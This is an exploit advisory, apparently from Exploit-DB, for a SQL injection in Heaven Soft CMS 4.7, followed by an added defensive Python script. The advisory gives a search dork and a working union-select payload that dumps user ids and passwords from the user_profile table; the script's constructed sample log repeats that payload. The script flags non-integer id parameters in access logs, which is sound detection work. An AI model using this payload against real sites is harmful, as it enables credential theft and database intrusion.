Heaven Soft CMS 4.7 – SQL Injection

  • Author: PrinceofHacking
    Date: 2010-05-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12599/
  • ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    [x] Type: SQL Injection Vulnerabilities
    [x] Vendor: http://www.newyorkindoorcricket.com/
    [x] Script Name: Heaven Soft, CMS Version: 4.7
    [x] author: PrinceofHacking
    [x] Team: Ashiyane Digital Security Team
    [x] Mail : Prince[dot]H4ck@gmail[dot]com
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    D0rk:"photogallery_show.php?id"
    
    
    Exploit:
    
    http://localhost/photogallery_show.php?id=-1
    union+select+group_concat(user_id,0x3a,password),2+from+user_profile--
    
    [!]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
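
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to photogallery_show.php whose id parameter is not a plain integer, using an allowlist rather than keyword matching. The log lines are constructed, and the combined log format and the 10-digit limit on id are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = '''\
203.0.113.7 - - [14/May/2010:10:01:02 +0000] "GET /photogallery_show.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [14/May/2010:10:01:09 +0000] "GET /photogallery_show.php?id=-1+union+select+group_concat(user_id,0x3a,password),2+from+user_profile-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.4 - - [14/May/2010:10:02:00 +0000] "GET /photogallery_show.php?id=abc HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.4 - - [14/May/2010:10:02:10 +0000] "GET /index.php?id=abc HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [14/May/2010:10:02:31 +0000] "GET /photogallery_show.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

# client IP, request line and status code of a combined-format log entry
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Allowlist: a gallery id is assumed to be a plain non-negative integer.
VALID_ID = re.compile(r'[0-9]{1,10}')
SCRIPT = "/photogallery_show.php"


def suspicious_requests(log_text, script=SCRIPT):
    """Return (ip, status, decoded_id) for hits on `script` whose id
    parameter is anything other than a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(script):
            continue  # a different script; out of scope for this check
        # parse_qs percent-decodes and maps '+' to a space, so the check
        # sees the value the PHP script would have received.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not VALID_ID.fullmatch(value):
                findings.append((m.group("ip"), int(m.group("status")), value))
    return findings


if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

The same allowlist (cast or validate id as an integer, then bind it as a query parameter) is the fix on the application side.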